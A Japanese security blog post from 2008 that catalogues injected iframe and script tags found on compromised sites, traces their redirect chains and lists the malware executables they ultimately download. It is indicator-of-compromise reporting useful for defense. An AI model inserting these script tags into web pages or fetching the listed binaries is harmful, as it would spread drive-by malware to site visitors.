ハルコタン紀行

インジェクション

追記の山になってしまった先週の記事のまとめです。
インジェクション
<iframe src="http://www.pkck.cn/web.htm"></iframe>
<script src="http://bbs.jueduizuan.com/ip.js"></script>
<script src="http://www.ririwow.cn/ip.js"></script>
<script src="http://www.kisswow.com.cn/m.js"></script>
<script src="http://www.11910.net/1.js"></script>
<script src="http://computershello.cn/1.js"></script> (2 5もある)
<script src="http://winzipices.cn/1.js"></script> (2 3 4 5もある)
(略)
バイナリ
http://www.pkck.cn/system.exe
http://dj.jueduizuan.com/ri.exe
http://www.bluell.cn/ri.exe
http://winzipices.cn/1.exe
http://61.188.38.158/images/test.exe

そして今回の新顔がこちらです。
インジェクション
<script src="http://www.adword71.com/b.js"></script>
<script src="http://www.caocaowow.cn/ip.js"></script>
<script src="http://www.direct84.com/7.js"></script>
<script src="http://www.killwow1.cn/g.js"></script>
<script src="http://www.wow112.cn/m.js"></script>
<script src="http://www.wowgm1.cn/m.js"></script>
<script src="http://www.wowgm2.cn/m.js"></script>
<script src="http://www.wowyeye.cn/m.js"></script>
<script src="http://9i5t.cn/a.js"></script>
<script src="http://a188.ws/1.js"></script>


http://www.adword71.com/b.js
http://www.direct84.com/7.js
→http://67.228.13.98/cgi-bin/index.cgi?user1
→http://dir51.com/index.php
 →http://216.32.85.234/index.php
(頻繁に変わるらしいので深追いしません)

http://www.killwow1.cn/g.js
→http://www.killwow1.cn/cc/
 →http://www.killwow1.cn/cc/04.htm
 →http://www.killwow1.cn/cc/14.htm
 →http://www.killwow1.cn/cc/new.htm
 →http://www.killwow1.cn/cc/rl.htm
  →http://www.qiuxuewow.cn/wow.exe

http://www.wow112.cn/m.js
http://www.wowgm1.cn/m.js
http://www.wowgm2.cn/m.js
http://www.wowyeye.cn/m.js
→http://www.wowyeye.cn/
 →http://www.wowyeye.cn/Help.htm
 →http://www.wowyeye.cn/New.htm
 →http://www.wowyeye.cn/real.htm
  →http://www.shadowgm.cn/bak.exe

http://9i5t.cn/a.js
→http://computershello.cn/g.js
(略)→http://61.188.38.158/images/test.exe (既出)

http://a188.ws/1.js
→http://b.kaobt.cn/img/hei.htm
 →http://b.kaobt.cn/14.htm
 →http://b.kaobt.cn/real.htm
 →http://b.kaobt.cn/real11.htm
 →http://b.kaobt.cn/lz.htm
 →http://b.kaobt.cn/bfyy.htm
  →http://g.jt08.com/ms.exe

バイナリ
http://www.shadowgm.cn/bak.exe
http://www.qiuxuewow.cn/wow.exe
http://g.jt08.com/ms.exe

日替定食みたいになってまいりました。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/05/14(水) 02:54:58|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<モンク30 | ホーム | 冒険者さんありがとうキャンペーン>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/36-51e1fedd
この記事にトラックバックする(FC2ブログユーザー)